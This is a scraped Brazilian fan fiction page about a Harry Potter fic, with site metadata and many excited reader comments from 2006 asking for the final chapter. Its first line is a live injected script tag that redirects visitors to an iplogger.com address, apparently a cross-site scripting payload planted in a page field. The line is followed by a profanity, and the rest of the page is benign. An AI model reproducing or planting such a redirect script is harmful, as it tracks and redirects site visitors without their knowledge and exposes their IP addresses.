<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
Ai Meu Deus to tremendu até agora caraca minha filha faz um livro pelo amor de deus =D vc sab u significado de amar? pois então eu AMO a sua fic vc num tem noção. bom, akele velhinhu foi espetacular, bem a cara dele se fingir ir por debaixo dos panos sem encarar os perigos de frente. E o Rony, ái como ele é td né? perfeito até quandu fica meio lerdinho, sorte da Hermione =D Ah e soninha meu amor vc quer o meu computador emprestado? hihihi eu te impresto pra vc fazer a fic tá? =D ahhhh epi...uke? explike-me u ki signifik ixu por favourrrr e último capítulo? poxo dar uma sugestão? faxa a continuação dexa fic vai ser u máximo. Aliás ela jah é u máximo, vai ser a continuação do máximo =P Eu nem consigo ler outras fics pq perto da sua todas parecem ruins =D mas non fika se axandu non heim? ;) ahhhhh a propósito vc tem msn? eu queria pra poder te pentelhar bastante pedindu pra vc postar a fic =D Tenho que ir, pois já são 1 da manha e as 6 eu tenho que estar de pé tah vendo u que a sua fic não faz cmg? =D ahhhh e um último pedidu. NON DEMORE UM MÊS PRA POSTAR PELO AMOR DE DEUSSSSS tah? beeeeeeeeeeeeijos pra vc minha segunda escritora preferida Dps da Jk ;)
2006-04-28se existe algum significado para apalavra perfeição a resposta é dua fic!! o 33 tá simplesmente demais!!!!!!!!!!!!!!!!!! naum querendo forçar a barra mas já forçando...e o resto? parabens e muitos beijos!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2006-04-28excelente!!!! demais!!!! cara, muito bom msm!!!
2006-04-28O prox cap será o último????? como assim???? ai meu Merlin naum vo conseguir viver sem sua fic.... Sônia vc está simplesmente de parabéns... Jah pensou em escrever o livro??? Pois deveria.... sua fic eh a melhor aki da floreios.... Adorei a Tonks dando um fim na Bella.. Espero pelo prox cap (com tristeza por ser o último)....bjos e ateh
2006-04-28Valeu a espera... Ameio o capítulo!!! Muito justo que a Tonks derrotasse a Bella... Agora é esperar o final... *mas e o Snape?!* Post!
2006-04-28Atualizaa looogo ! tô morrendo de curiosidade pra saber ! e a fic tá muiiito legal ! vc está de parabéns, ótima criatividade !
2006-04-28gostei desse cap. Mas eu queroi maisss, maisss. uuuu! Qru o ultimo cap logo! e, QUE OTIMO Q A BELLA FOI-SE! OBA! VIVA TONKS!
2006-04-281º otimo cap... 2º ja vai acabar... entao pelo menos te dejeso + inspiracao e mente aberta p/ q vc possa criar outras fics tao boas quanto esta....
2006-04-28sou a favor da sua fic não acabar nuncaa!!! promete que vai continuar depois?! tem comunidade pra fic? bjs
2006-04-28Meu DEEEEEEEEEEEEEEUUUUUUUSSSSSSSSSSSSSSSS!!!! Que coisa maravilhosa esse cap... Nao acredito q o proximo ja é o ultimo... snif! Poxa, concordo com a galera, vc tem que escrever um livro! Bjs.
2006-04-28